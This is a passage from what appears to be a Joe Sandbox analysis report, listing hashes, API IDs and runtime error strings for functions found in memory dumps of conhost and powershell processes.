                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$ProtectQuery
                                                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                                        • API String ID: 1027372294-1286557213
                                                                                        • Opcode ID: d6c8e89c0488428606cb2e8003e922a342307a1c96a15d80c0e1811b70fcf3a2
                                                                                        • Instruction ID: 4b58318269e2109197a8f03c0638dc41b8a38b67f4745399ac80cad4ed2fef75
                                                                                        • Opcode Fuzzy Hash: d6c8e89c0488428606cb2e8003e922a342307a1c96a15d80c0e1811b70fcf3a2
                                                                                        • Instruction Fuzzy Hash: D891D321F1A54386EA22AB2BD44067923E0BF45FACF544235DA1D977EADF7CE441C720
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B297D110 Relevance: 6.3, APIs: 5, Instructions: 95stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: freememcpystrlen
                                                                                        • String ID:
                                                                                        • API String ID: 2208669145-0
                                                                                        • Opcode ID: 8e37fd4144fb27c017fba0f4012ca99b5eb31d3c4b64029982dfb59845ed7414
                                                                                        • Instruction ID: 97d47f90e080e75d73eddfc1f7df0f2b8b06f1d7a5fc759a5ee32346a417df54
                                                                                        • Opcode Fuzzy Hash: 8e37fd4144fb27c017fba0f4012ca99b5eb31d3c4b64029982dfb59845ed7414
                                                                                        • Instruction Fuzzy Hash: A331CB22A1F64341F9677A1F6A0037956D06F95FE8F184230DF5D8ABE6DFBCE4428220
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B2986270 Relevance: 6.1, APIs: 4, Instructions: 92COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Byte$CharLeadMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 2561704868-0
                                                                                        • Opcode ID: 72e5182a53e13fa889d886ff83eae27f3b77cb04a3f3d9c06ddc89f4c59f6935
                                                                                        • Instruction ID: 34a8cadda64696b6b8cbc6806c3c7fa100aeabc667f47aa6352adfc35c6be373
                                                                                        • Opcode Fuzzy Hash: 72e5182a53e13fa889d886ff83eae27f3b77cb04a3f3d9c06ddc89f4c59f6935
                                                                                        • Instruction Fuzzy Hash: 0431B972A0C2828AE7625B2AB4003AD76D0BB947D8F584135EB9CCF7D6CFBDD4458B00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B29733D0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcslen
                                                                                        • String ID: 0$@
                                                                                        • API String ID: 4088430540-1545510068
                                                                                        • Opcode ID: 83de946b4162375b974e7bb97038d8fe3c00661d89f7eee478084eae0bcca88b
                                                                                        • Instruction ID: a20cdaeaca4c88e5d3d7bf54217c46c68436dff7a4a78c5f5d3a8dac0257eab6
                                                                                        • Opcode Fuzzy Hash: 83de946b4162375b974e7bb97038d8fe3c00661d89f7eee478084eae0bcca88b
                                                                                        • Instruction Fuzzy Hash: 3F215C3261878186E3219B69F44579AB7A4FBC4398F644135EB8C87B5AEF7DC045CB00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B2978695 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 63stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: strlen
                                                                                        • String ID: this${parm#$}
                                                                                        • API String ID: 39653677-3278767634
                                                                                        • Opcode ID: b6560bc235915b3a98ae37b5da3fee9c42ec4f310a871c77db2b843ae1a5a95c
                                                                                        • Instruction ID: 6856f9894c669db233fbab97f0f9d4fed5bbd1c59838f68068df557ebe2c8bf9
                                                                                        • Opcode Fuzzy Hash: b6560bc235915b3a98ae37b5da3fee9c42ec4f310a871c77db2b843ae1a5a95c
                                                                                        • Instruction Fuzzy Hash: 2D216772A4C6C385E75BAF2A94003FD2791EB15B98F484031CF4D4A69ADFBC94468321
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B2973580 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcslen
                                                                                        • String ID: 0$@
                                                                                        • API String ID: 4088430540-1545510068
                                                                                        • Opcode ID: 4d3d5522ca90d6377aa2f906a2b8d875efe3dfc2a58d6c5f410f884776b73289
                                                                                        • Instruction ID: 321f5fca37bd97fea3e27bd0f6ebd0047cd3bf3e6c4d7dda3d4666ae57b57ba2
                                                                                        • Opcode Fuzzy Hash: 4d3d5522ca90d6377aa2f906a2b8d875efe3dfc2a58d6c5f410f884776b73289
                                                                                        • Instruction Fuzzy Hash: D211862261878182E7119B55F44135AA7B0EBC8394F545135FB8C87B66EF7DC445CB00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B29734F0 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcslen
                                                                                        • String ID: 0$@$eth
                                                                                        • API String ID: 4088430540-2562130303
                                                                                        • Opcode ID: 525c2e913c521c906cb0dbdadb8c9f3fc6cc840dfcdef27008fbcc2c9a6ecc34
                                                                                        • Instruction ID: 36e289ca1552a7ea86048c8a40512603c5f699d4770f59a2ac1af3dfeff85efd
                                                                                        • Opcode Fuzzy Hash: 525c2e913c521c906cb0dbdadb8c9f3fc6cc840dfcdef27008fbcc2c9a6ecc34
                                                                                        • Instruction Fuzzy Hash: 37F0816262878082E7119B65F08539AB3B0EBC8358F641125F78C8BB6AEF7DC5948B04
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B297D440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: fprintf
                                                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                        • API String ID: 383729395-3474627141
                                                                                        • Opcode ID: a159d96b7ae705f4d8f5554fed5eb150cf9475c31c814e33906dcef587cbc926
                                                                                        • Instruction ID: 5c0b4621267702f702fc6e7325f91eac19ad5c4b23c102943c5b227deb58464b
                                                                                        • Opcode Fuzzy Hash: a159d96b7ae705f4d8f5554fed5eb150cf9475c31c814e33906dcef587cbc926
                                                                                        • Instruction Fuzzy Hash: 3101C222808E8582D2029F1DD8011EA73B4FF9AB9DF285321FB8C2A261DF69D543C700
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B297D4E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: fprintf
                                                                                        • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                        • API String ID: 383729395-4064033741
                                                                                        • Opcode ID: 40b9f6fe7bf7bebd469e63e0438e366e82e16580e69c1e7db4f72bc4653bac8e
                                                                                        • Instruction ID: abcc441972eedde565badcfea9e5e7790acc9a0be13b636f85ad019d8bb300d6
                                                                                        • Opcode Fuzzy Hash: 40b9f6fe7bf7bebd469e63e0438e366e82e16580e69c1e7db4f72bc4653bac8e
                                                                                        • Instruction Fuzzy Hash: E9F06253808E8581D2429F1DE4001ABB3B5FF8EB9DF285325EB8D2E565DF69E6438700
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B297D4F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: fprintf
                                                                                        • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                        • API String ID: 383729395-2187435201
                                                                                        • Opcode ID: 09884fc2631abadc73fb08c4f511bd8154b3cb361625a1ef1a9fc1d45e48c44c
                                                                                        • Instruction ID: 74450b0cdd7cf7c916a74b7f06f01a56d7dd3ae8729565d0f9ea88c6b73a8da4
                                                                                        • Opcode Fuzzy Hash: 09884fc2631abadc73fb08c4f511bd8154b3cb361625a1ef1a9fc1d45e48c44c
                                                                                        • Instruction Fuzzy Hash: 1AF06252808E8981D2129F1DA4401ABB3B1FF8EB9DF285325EB8D2E565DF68E6438700
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B297D520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: fprintf
                                                                                        • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                        • API String ID: 383729395-2468659920
                                                                                        • Opcode ID: dfa907c366492a440895950e4c2f4b244cf75973cea729fb3e13f235bb49f79e
                                                                                        • Instruction ID: 7d46216bfd8f5e8aacd862c8994ccc2be141c546faddb8e2d784728b2d0e0ad4
                                                                                        • Opcode Fuzzy Hash: dfa907c366492a440895950e4c2f4b244cf75973cea729fb3e13f235bb49f79e
                                                                                        • Instruction Fuzzy Hash: 14F06252808E8581D6129F1DE4001ABB3B5FF8EB9DF285326EB8D6E565DF68E6438700
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B297D500 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: fprintf
                                                                                        • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                        • API String ID: 383729395-4273532761
                                                                                        • Opcode ID: 05e9ce7e958dceb5b034382f22db94f2568f1ed429f504eaba41287e3d46dc34
                                                                                        • Instruction ID: 740d3bb2b68ec47225e9076312f9d45b37ab6fc42cb4f92988060ae4004917b4
                                                                                        • Opcode Fuzzy Hash: 05e9ce7e958dceb5b034382f22db94f2568f1ed429f504eaba41287e3d46dc34
                                                                                        • Instruction Fuzzy Hash: 6FF06252808E8581D2029F1DA4001ABB3B1FF8EB9DF285325EB8D6E565DF68E6438700
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B297D510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: fprintf
                                                                                        • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                        • API String ID: 383729395-4283191376
                                                                                        • Opcode ID: c8f5c894360afe59ea60c38c4de3ccab1fab56ca9f6d5979e5d5a3cd47ce0a69
                                                                                        • Instruction ID: b24cb2aec0625efed258b0bf6c17b1acb6177ebd52201b04fd53660c2cc2a17d
                                                                                        • Opcode Fuzzy Hash: c8f5c894360afe59ea60c38c4de3ccab1fab56ca9f6d5979e5d5a3cd47ce0a69
                                                                                        • Instruction Fuzzy Hash: ACF06252908E8581D2029F1DA4401ABB3B1FF8EB9DF285325EB8D3E565DF68E6438700
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B297D471 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: fprintf
                                                                                        • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                        • API String ID: 383729395-2713391170
                                                                                        • Opcode ID: ecf9db1b0195a7f055112cb43230a9d69b3516830daafa228354ca373a24e433
                                                                                        • Instruction ID: 7d5536e06375dac55c8154401b3a64a7d5248a15a8af5d478cf632c9a8695230
                                                                                        • Opcode Fuzzy Hash: ecf9db1b0195a7f055112cb43230a9d69b3516830daafa228354ca373a24e433
                                                                                        • Instruction Fuzzy Hash: FCF06216904E8581D2029F1DA4001ABB3A1FF4E78DF185326EF8D2E525DF69D5438700
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B297DE60 Relevance: 5.0, APIs: 4, Instructions: 42COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeavefree
                                                                                        • String ID:
                                                                                        • API String ID: 4020351045-0
                                                                                        • Opcode ID: 2b23665d719a0b01df7ca3bd72d89b1294c132fa16c7af1136569d2c972079f8
                                                                                        • Instruction ID: 5763e78d404ba0e54dbf691a413a464a192005c9613af607f98f8bcdd70f4218
                                                                                        • Opcode Fuzzy Hash: 2b23665d719a0b01df7ca3bd72d89b1294c132fa16c7af1136569d2c972079f8
                                                                                        • Instruction Fuzzy Hash: A1113C21B0960387EA17BB5BA88013923D5AFA8F58B544474C60DC72A3DFECEC518354
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Executed Functions

                                                                                        Function 00007FF848FF4943 Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2397714858.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848ff0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: p/%I
                                                                                        • API String ID: 0-2660849550
